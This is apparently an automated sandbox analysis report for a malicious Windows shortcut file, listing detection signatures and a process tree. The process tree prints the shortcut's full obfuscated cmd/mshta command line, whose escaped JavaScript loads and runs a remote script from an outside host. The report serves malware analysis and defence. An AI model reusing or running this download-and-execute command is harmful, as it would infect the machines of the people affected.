Edit tour
Windows
Analysis Report
ProconGO1121082800.LnK.lnk
Overview
General Information
Detection
Score: | 52 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Windows shortcut file (LNK) starts blacklisted processes
Machine Learning detection for sample
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 6440 cmdline:
"C:\Window s\System32 \cmd.exe" /c MshtA " JaVAsCrIpT :var _$_WX KH=["\x5a\ x53\x46\x4 d\113\x38\ 116","\x73 \x63\162\x 69\160\164 \x3a\x48\x 54\x74\x70 \x73\x3a\x 2f\x2f\x66 \x6c\151\x 6e\x61\x6e \x6d\x61\x 6e\x73\x61 \154\56\16 2\x6f\x75\ x70\x61\x6 7\x75\143\ x63\x69\x2 e\163\x62\ x73\57\x3f \x31\x2f"] ;try{GetOb ject(_$_WX KH[1])[_$_ WXKH[0]]() }catch(e){ };close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6900 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - mshta.exe (PID: 5224 cmdline:
MshtA "JaV AsCrIpT:va r _$_WXKH= ["\x5a\x53 \x46\x4d\1 13\x38\116 ","\x73\x6 3\162\x69\ 160\164\x3 a\x48\x54\ x74\x70\x7 3\x3a\x2f\ x2f\x66\x6 c\151\x6e\ x61\x6e\x6 d\x61\x6e\ x73\x61\15 4\56\162\x 6f\x75\x70 \x61\x67\x 75\143\x63 \x69\x2e\1 63\x62\x73 \57\x3f\x3 1\x2f"];tr y{GetObjec t(_$_WXKH[ 1])[_$_WXK H[0]]()}ca tch(e){};c lose()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- cleanup
⊘No configs have been found
⊘No yara matches
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Joe Sandbox ML: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |